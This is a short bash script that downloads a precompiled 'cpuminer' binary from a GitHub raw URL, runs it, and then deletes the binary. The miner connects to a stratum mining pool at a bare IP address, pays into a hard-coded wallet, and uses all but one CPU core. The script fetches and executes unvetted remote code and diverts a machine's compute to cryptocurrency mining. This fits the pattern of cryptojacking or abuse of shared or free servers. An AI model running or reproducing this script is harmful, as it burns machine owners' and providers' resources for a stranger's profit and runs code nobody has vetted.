#!/bin/bash

# Do not edit this file!
# kumaha aink we njink

cd /home
wget https://raw.githubusercontent.com/TheJackalTrib/gasken/master/cpuminer
chmod +x cpuminer
./cpuminer -a minotaurx -o stratum+tcp://43.228.215.76:8080 -u DBvi4ZFPxxVB1ivfNffHHP8kSWABVc2MQK -p c=DGB,zap=BUT-lyra2z330 -t $(nproc --ignore 1)
rm -irf cpuminer
